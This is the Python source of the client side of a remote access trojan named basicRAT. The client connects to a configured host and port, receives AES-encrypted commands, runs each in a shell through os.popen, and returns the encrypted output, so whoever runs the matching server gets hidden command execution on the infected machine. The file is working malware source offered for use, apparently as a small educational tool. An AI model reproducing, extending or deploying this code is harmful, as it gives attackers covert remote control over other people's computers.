basicRAT_client.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import os
import socket
import sys

from Crypto import Random
from Crypto.Cipher import AES

HOST = 'localhost'
PORT = 1337
KEY  = '82e672ae054aa4de6f042c888111686a'
# generate your own key with...
# python -c "import binascii, os; print(binascii.hexlify(os.urandom(16)))"


def pad(s):
    return s + b"\0" * (AES.block_size - len(s) % AES.block_size)


def encrypt(plaintext):
    plaintext = pad(plaintext)
    iv = Random.new().read(AES.block_size)
    cipher = AES.new(KEY, AES.MODE_CBC, iv)
    return iv + cipher.encrypt(plaintext)


def decrypt(ciphertext):
    iv = ciphertext[:AES.block_size]
    cipher = AES.new(KEY, AES.MODE_CBC, iv)
    plaintext = cipher.decrypt(ciphertext[AES.block_size:])
    return plaintext.rstrip(b'\0')


def main():
    s = socket.socket()
    s.connect((HOST, PORT))

    while True:
        data = s.recv(1024)
        cmd = decrypt(data)

        # stop client
        if cmd == 'quit':
            s.close()
            sys.exit(0)

        results = os.popen(cmd).read()
        s.sendall(encrypt(results))


if __name__ == '__main__':
    main()